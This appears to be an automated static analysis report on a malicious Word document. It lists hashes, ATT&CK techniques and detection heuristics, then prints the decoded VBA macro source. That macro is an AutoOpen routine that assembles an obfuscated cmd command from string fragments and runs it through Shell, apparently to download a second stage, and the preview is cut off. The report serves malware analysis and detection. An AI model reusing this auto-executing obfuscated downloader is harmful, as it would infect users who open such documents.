Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10298001d0cf5408…

MALICIOUS

Office (OLE)

Size: 96.9 KB
Created: 2018-08-01 15:10:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: e501582b929fad41df5b4b6e5178cb33
SHA-1: 4a4a4b35d763b1845c51b5d63f4c24f908bd3902
SHA-256: 10298001d0cf5408d6d28838518888438ca64d5cc545c0aa9de1d0a7dafb2758
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV and contains a critical AutoOpen VBA macro. The macro's obfuscated code attempts to execute a command using Shell, indicating it's likely a downloader for a second-stage payload. The presence of legacy WordBasic markers further supports its malicious nature.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6744207-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6744207-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5894 bytes
SHA-256: ded1a105b41d6cbf4d52bbf78784ca5c336ba809070a86803d83bce8f764e44b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iElOVPZhwLkt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate Fix(jzRWtC - fZXwa + 27802 / lYFzcj)
   AppActivate Rnd(79493 * rNvjNB * hNKFFW * vDdvlI)
   AppActivate CBool(JvcARE)
   AppActivate 158128112
   AppActivate Oct(508903204)
Shell@ CVar("cm") + zSmQzfbEj + dwOrIlO + kUAWH + qzNHjk + CrWhqEVBH + XGjUDGlUzwTQ + RnKOprUj, 492341173 - 492341173
   AppActivate 4087
   AppActivate oWKQjb
End Sub


Attribute VB_Name = "YfWSunCzuilOsc"
Function kUAWH()
On Error Resume Next
AppActivate Atn(jYAoS)
   AppActivate Sgn(vYjwRp)
zXqRAUaw = "d /" + "V:/" + "C" + CStr(Chr(fLhDUTwU + HlnzBwCDIo + 34 + irviGXa + FSNbrLBMLEjmnY)) + "se" + "t i" + "cX=" + "iz" + "XquhB" + "I" + "wbtEjbVz5C" + "Lc32F)S" + "dOsk" + "xZo8,Y{l\y"
AppActivate Int(4)
   AppActivate CInt(VLaoYw)
VKFdzdmCGwm = "Pm;$pMe" + "D" + "-K" + "vnrNJ1}" + "a+@g.=W" + "' f/:7(&" + "&for %6 " + "in (" + "43"
AppActivate Oct(VrbMZ)
   AppActivate Chr(HHmkvm)
kTGpPpBSXbr = ";31" + ";8;45;51;" + "27;5;4" + "5" + ";36;36;6" + "4;4" + "2;34;43" + ";26" + ";61;" + "50;45;8" + ";47;31;13;"
AppActivate oKuORw
   AppActivate iwsijR
vWqhBqlZPXW = "12;45" + ";19;10;64" + ";52;45" + ";10" + ";60;62;4"
AppActivate 1
   AppActivate SiXcwc
   AppActivate CSng(2)
cZNjVTQATJ = "5;13;" + "17;36" + ";0;4" + "5;50;10" + ";4" + "1;42;48;49" + ";17;" + "61;63;5" + ";10" + ";10;4"
AppActivate 418
   AppActivate ChrB(2724)
CnimzZrHjIE = "3" + ";67;6" + "6;66;50;4" + "5;13" + ";4;36" + ";56;47" + ";4"
AppActivate CSng(ipSUP)
   AppActivate 26
   AppActivate Tan(3)
KEjSmN = "5;50;1" + "0" + ";60;1" + "9;31;40;6" + "6;1" + "0;20;5" + "8;5;10;10" + ";43;67;66" + ";66;45;2" + "8;10;3" + "1"
kUAWH = zXqRAUaw + VKFdzdmCGwm + kTGpPpBSXbr + vWqhBqlZPXW + cZNjVTQATJ + CnimzZrHjIE + KEjSmN
   AppActivate Atn(zjGUiH)
   AppActivate Hex(Iwlslm)
   AppActivate Rnd(itScb)
End Function
Function qzNHjk()
On Error Resume Next
AppActivate 210
   AppActivate Wjbjn
   AppActivate scTBq
VXuimklZD = ";51;6" + "0;19;" + "31;40;60;" + "13;51;" + "66;2;62;6" + "2;43;18;2" + "9;1" + "7;7" + ";58;5" + ";10;10;4" + "3" + ";67" + ";66;6"
AppActivate Fix(SBYZfD * imAlr)
   AppActivate Oct(TBRNW)
QIzqGFvkrZ = "6;50;45;5" + "9;51;45;" + "0;5" + "1;3" + "1;" + "27;60" + ";" + "19;" + "31;4" + "0;60" + ";13"
AppActivate Int(58)
   AppActivate 4739
   AppActivate Chr(sGcFni)
pQiQoM = ";51;66" + ";13;0;50;" + "66;15;31;3" + "0;1" + "3;58;5;10;" + "10;43" + ";67;66;6"
AppActivate rJaiFs
   AppActivate Int(ttmbzA)
   AppActivate CStr(17230 * kdAwQ)
jOkiXTzs = "6;50" + ";47;" + "40;3" + "1;5" + "1;0;40;31" + ";10;31;" + "60;12;"
AppActivate Rnd(jYauvI + dCIDt)
   AppActivate 2
zhFJqiZw = "43;66;" + "12;16;32;2" + "0" + ";1" + "4;" + "43;4" + "3;22;5" + "8;5;10;1" + "0;43;67;66" + ";66;40;27;" + "19;38"
AppActivate ZRwKK
   AppActivate Tan(zwUtz)
HJWzUGJPYVM = ";56" + ";43;0;6" + "0;19;31;" + "40;6" + "6;40;2" + "7;19;0;5" + "0" + ";"
AppActivate Sin(51687 * VzZTsk - lOwzrb / AYIzZ)
   AppActivate CLng(tanSdw)
   AppActivate CDate(27926 * VKhWX)
GchbmwqmH = "27;56;" + "5" + "6" + ";10;60;19;" + "3" + "1;40" + ";66;19;62;" + "6;53;2;34;" + "20;63;6" + "0;24;43;3" + "6"
AppActivate 125205896
   AppActivate oTLwM
   AppActivate 6
UZKmNM = ";0;10;6" + "9;63;58;63" + ";23;41;" + "42;4;34" + ";30;64" + ";61;6" + "4;63;68;21"
AppActivate CSng(519735951)
   AppActivate Oct(VqKSc + bWmAO / 73779 - WpcmJ)
aIazq = ";5" + "4;6" + "3" + ";41;42;5" + ";44;19;6" + "1;42;45;5" + "0;49;67;10" + ";45;40;43" + ";57;63;" + "37;63;57" + ";"
AppActivate CBool(9)
   AppActivate ChrB(73482 - 14481)
   AppActivate ChrB(fTzOqE)
Hltjb = "4" + "2;4;34;30" + ";57;63;" + "60;" + "45;29;45" + ";" + "63;41" + ";65;31" + ";" + "5" + "1;45;56;"
qzNHjk = VXuimklZD + QIzqGFvkrZ + pQiQoM + jOkiXTzs + zhFJqiZw + HJWzUG
... (truncated)